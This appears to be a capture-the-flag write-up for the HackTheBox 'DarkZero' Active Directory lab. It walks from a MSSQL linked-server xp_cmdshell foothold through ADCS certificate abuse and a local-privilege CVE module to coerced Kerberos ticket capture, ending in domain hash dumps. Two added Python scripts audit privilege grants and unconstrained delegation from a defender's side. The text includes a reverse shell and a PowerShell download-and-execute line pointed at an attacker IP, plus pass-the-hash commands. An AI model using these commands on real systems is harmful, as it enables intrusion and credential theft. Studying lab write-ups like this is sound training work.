Basic information

As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!

Port scan

Port 1433 plus the usual Windows domain ports:

$ nmap -sC -sV -Pn 10.10.11.89
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-08 15:35 JST
Nmap scan report for 10.10.11.89
Host is up (0.19s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-08 13:10:52Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-10-08T13:12:17+00:00; +6h33m14s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-08T13:10:02
|_Not valid after: 2055-10-08T13:10:02
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h33m14s, deviation: 0s, median: 6h33m13s
| smb2-time:
| date: 2025-10-08T13:11:39
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.47 seconds

bloodhound

With the initial account provided, add the hosts entries and start with the usual BloodHound collection:

10.10.11.89 darkzero.htb dc01.darkzero.htb dc01

bloodhound-python -d darkzero.htb -u john.w -p 'RFulUtONCOL!' -ns 10.10.11.89 -c All --zip

The BloodHound data turns out to be largely unnecessary for this box, though.

mssql

The provided account can log in to MSSQL:

python3 examples/mssqlclient.py darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth

As guest it can also run xp_dirtree, although that is of no use for now, since it only coerces the machine account's hash:

SQL (darkzero\john.w  guest@master)> xp_dirtree \\10.10.14.9\miao

Linked server

There is, however, a linked server, DC02.darkzero.ext:

SQL (darkzero\john.w  guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell whoami

svc_sql shell

So use xp_cmdshell directly to get a shell as svc_sql:

xp_cmdshell "powershell xxxxx"

svc_sql to DC02$

There is an unintended route here; the intended one goes roughly as follows.

First, set up the environment:

# local
$ ./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
meterpreter > upload chisel.exe

Start-Job -ScriptBlock {C:\temp\chisel.exe client 10.10.14.9:9999 R:socks}

# hosts
172.16.20.2 dc02.DARKZERO.EXT

# mac: sync the clock with the DC
sudo sntp -sS 10.10.11.89

Policy_Backup

In the root of the C: drive there is a Policy_Backup.inf file, which looks like a group policy backup. In it, SeImpersonatePrivilege is assigned to S-1-5-6, the SERVICE group, and svc_sql is a member of that group; but because of UAC the current shell does not hold SeImpersonatePrivilege:

SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
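The line above is the secedit INF format that GPO backups use: one privilege per line, with a comma-separated list of principals, SIDs prefixed by an asterisk. From a defender's side, the useful check is to parse that section and see which principals hold token-impersonation rights, because every service account that lands in one of them (as svc_sql does via SERVICE) has the starting point for the SYSTEM escalation used below. The following parser is an added example for this writeup, not code from the box or its author; the sample INF text is constructed around the line quoted above, and the "broad principal" list is my own choice of SIDs to flag.

```python
"""Audit the [Privilege Rights] section of a secedit/GPO backup .inf file.

Added example for this writeup; not code from the box or from the author.
The sample INF below is constructed (based on the SeImpersonatePrivilege line
quoted in the writeup) so the script runs offline.
"""

# Well-known SIDs as documented by Microsoft (subset relevant to user rights).
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-6": "SERVICE",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-19": "LOCAL SERVICE",
    "S-1-5-20": "NETWORK SERVICE",
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-545": "Users",
}

# Rights that let the holder impersonate or assign tokens; these are the
# rights the service-account-to-SYSTEM step in the writeup depends on.
IMPERSONATION_RIGHTS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Principals broad enough that a grant to them reaches every service or
# logged-on account. S-1-5-6 (SERVICE) is the Windows default for
# SeImpersonatePrivilege, which is exactly why any service account has it.
BROAD_PRINCIPALS = {"S-1-1-0", "S-1-5-6", "S-1-5-11", "S-1-5-32-545"}

# Constructed sample, shaped like a secedit export (leading BOM included).
SAMPLE_INF = """\ufeff[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {privilege: [sid, ...]} from the [Privilege Rights] section."""
    rights = {}
    in_section = False
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Entries are comma separated; SIDs carry a leading '*', names do not.
        sids = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
        rights[name.strip()] = sids
    return rights


def resolve_sid(sid):
    """Map a well-known SID to its name; unknown SIDs are returned unchanged."""
    return WELL_KNOWN_SIDS.get(sid, sid)


def risky_impersonation_grants(rights):
    """List (privilege, sid, name) where an impersonation right reaches a broad principal."""
    findings = []
    for priv in sorted(rights):
        if priv not in IMPERSONATION_RIGHTS:
            continue
        for sid in rights[priv]:
            if sid in BROAD_PRINCIPALS:
                findings.append((priv, sid, resolve_sid(sid)))
    return findings


def audit_inf_text(text):
    """Parse the INF text and return (rights, findings)."""
    rights = parse_privilege_rights(text)
    return rights, risky_impersonation_grants(rights)


def load_inf(path):
    """secedit writes UTF-16 with a BOM; fall back to UTF-8 for hand-edited files."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(b"\xff\xfe") or data.startswith(b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


if __name__ == "__main__":
    rights, findings = audit_inf_text(SAMPLE_INF)
    for priv, sids in rights.items():
        print(priv, "->", ", ".join(resolve_sid(s) for s in sids))
    for priv, sid, name in findings:
        print(f"[!] {priv} granted to {name} ({sid}): reachable by any service account")
```

Run it against a real backup with `audit_inf_text(load_inf("Policy_Backup.inf"))`. The takeaway is that the SERVICE grant is the default, so the mitigation is not editing the INF but running SQL Server under a virtual or low-privilege account and keeping xp_cmdshell disabled, since the impersonation right is only dangerous once someone can execute code as the service.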

ADCS: get svc_sql

So we need a small detour: authenticate through ADCS to obtain full svc_sql privileges:

meterpreter > upload /Users/miao/Tools/Offsec/Certify.exe

C:\temp>Certify.exe request /ca:DC02\darkzero-ext-DC02-CA /template:User
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

proxychains4 certipy auth -pfx cert.pfx -u svc_sql -domain darkzero.ext -dc-ip 172.16.20.2

[*] Got hash for 'svc_sql@darkzero.ext': aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f

svc_sql full power

With the svc_sql hash in hand the usual login methods do not work, so change the password directly and switch user with runas:

proxychains4 python3 examples/changepasswd.py svc_sql@darkzero.ext -hashes :816ccb849956b531db139346751db65f -newpass 'StrongPassword123' -dc-ip 172.16.20.2

meterpreter > upload RunasCs.exe

PS C:\temp> .\RunasCs.exe svc_sql 'StrongPassword123' powershell -l 5 -b -r 10.10.14.9:4444

This gives a full svc_sql session that holds SeImpersonatePrivilege:

svc_sql to DC02$

After that it is a one-click getsystem:

IEX ((new-object net.webclient).downloadstring('http://10.10.14.9:7777/msf.ps1'))

Unintended LPE

Escalate straight to SYSTEM via the CVE:

msf6 > use exploit/windows/local/cve_2024_30088_authz_basep

dc02 hashdump

The svc_sql hash shown here is the one after the password was changed:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:69d8ed878401176eb6db4d53e57c6127:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::

user flag

On the Administrator desktop of DC02:

DC02 to DC01 & root flag

Now with SYSTEM on DC02, and knowing from earlier that DC01 can be coerced into authenticating via MSSQL, and since DC02 and DC01 have a two-way trust and domain controllers have unconstrained delegation by default, simply coerce the access and extract the ticket:

# DC02 system
Rubeus.exe monitor /interval:5 /nowrap

# mssql
python3 examples/mssqlclient.py darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\miao

# Rubeus on DC02 receives the DC01$@DARKZERO.HTB ticket
cat dc01.b64| base64 -d > dc01.kirbi
python3 examples/ticketConverter.py dc01.kirbi dc01.ccache

# use the dc01 ticket
export KRB5CCNAME=dc01.ccache
python3 examples/secretsdump.py darkzero.htb/dc01\$@dc01.darkzero.htb -k -no-pass -dc-ip 10.10.11.89 -just-dc-user Administrator

5917507bdf2ef2c2b0a869a1cba40726
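The step above works because the account that received the coerced authentication (DC02$) is trusted for unconstrained delegation, so the TGT of DC01$ was forwarded along with the service ticket. Domain controllers carry that flag by design, but on the defender's side the thing to audit is every other account that has it, and whether privileged accounts are marked so that they cannot be delegated at all. The script below is an added example for this writeup, not the author's code; the account records are a constructed stand-in for what an LDAP query against the forest would return, and the names FILE01$ and WS01$ are assumptions.

```python
"""Audit userAccountControl for unconstrained delegation.

Added example for this writeup, not the author's code. SAMPLE_RECORDS is a
constructed stand-in for LDAP results; the host names are assumptions.
"""

# userAccountControl bit flags as documented by Microsoft (subset).
WORKSTATION_TRUST_ACCOUNT = 0x1000          # member computer account
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
NORMAL_ACCOUNT = 0x200
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

FLAG_NAMES = {
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
    NOT_DELEGATED: "NOT_DELEGATED",
    TRUSTED_TO_AUTH_FOR_DELEGATION: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# OID of the LDAP_MATCHING_RULE_BIT_AND extensible match used to test a bit flag.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample: one DC (unconstrained by design), one member server that
# was wrongly trusted for unconstrained delegation, one plain workstation, the
# SQL service account, and an admin account protected with NOT_DELEGATED.
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC02$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "FILE01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD},
    {"sAMAccountName": "Administrator", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | NOT_DELEGATED},
]


def unconstrained_filter():
    """LDAP filter that selects every object with TRUSTED_FOR_DELEGATION set."""
    return f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={TRUSTED_FOR_DELEGATION})"


def decode_uac(uac):
    """Return the sorted names of the known flags set in a userAccountControl value."""
    return sorted(name for bit, name in FLAG_NAMES.items() if uac & bit)


def find_unconstrained(records, include_dcs=False):
    """sAMAccountNames with unconstrained delegation.

    Domain controllers carry the flag by design (the property the writeup relies
    on), so they are skipped unless include_dcs is set; any other hit is a finding.
    """
    hits = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        if uac & SERVER_TRUST_ACCOUNT and not include_dcs:
            continue
        hits.append(rec["sAMAccountName"])
    return hits


def unprotected_privileged(records, privileged_names):
    """Privileged accounts that lack NOT_DELEGATED, i.e. whose TGT can still be forwarded."""
    return [
        rec["sAMAccountName"]
        for rec in records
        if rec["sAMAccountName"] in privileged_names
        and not int(rec["userAccountControl"]) & NOT_DELEGATED
    ]


if __name__ == "__main__":
    print("LDAP filter:", unconstrained_filter())
    for rec in SAMPLE_RECORDS:
        print(rec["sAMAccountName"], decode_uac(rec["userAccountControl"]))
    print("non-DC unconstrained:", find_unconstrained(SAMPLE_RECORDS))
    print("privileged without NOT_DELEGATED:",
          unprotected_privileged(SAMPLE_RECORDS, {"Administrator", "svc_sql"}))
```

In a live environment the records come from an LDAP search with `unconstrained_filter()` requesting `sAMAccountName` and `userAccountControl`; any non-DC in the result is a host on which a captured TGT has the same value it had on DC02 here. Flagging privileged accounts without NOT_DELEGATED (or membership in Protected Users) covers the other half: a ticket that cannot be forwarded is of no use to a collector like the one in this writeup.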

root flag

With the Administrator hash obtained, just log in:

evil-winrm -i 10.10.11.89 -u Administrator -H 5917507bdf2ef2c2b0a869a1cba40726

dc01 hashdump

python3 examples/secretsdump.py darkzero.htb/dc01\$@dc01.darkzero.htb -k -no-pass -dc-ip 10.10.11.89 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::

References